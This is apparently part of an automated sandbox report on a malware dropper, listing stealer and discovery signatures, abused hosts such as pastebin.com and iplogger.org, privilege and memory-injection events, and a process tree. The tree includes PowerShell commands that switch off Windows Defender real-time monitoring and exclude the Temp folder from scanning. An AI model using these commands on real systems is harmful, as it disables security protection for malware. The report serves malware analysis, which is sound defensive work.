N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2512 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2284 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2744 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe

